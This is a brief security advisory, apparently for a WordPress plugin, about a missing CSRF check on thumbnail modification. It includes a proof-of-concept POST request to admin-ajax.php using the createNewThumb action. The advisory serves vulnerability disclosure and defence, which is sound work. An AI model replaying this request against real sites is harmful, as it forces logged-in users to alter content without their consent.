The plugin does not have Cross-Site Request Forgery (CSRF) check when modify the thumbnail, which could allow attackers to make logged in users with the edit_post capability to perform such action via a Cross-Site Request Forgery (CSRF) attack.

Proof of Concept

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded

action=createNewThumb&id=1&x=10&y=10&h=10&w=10&rr=1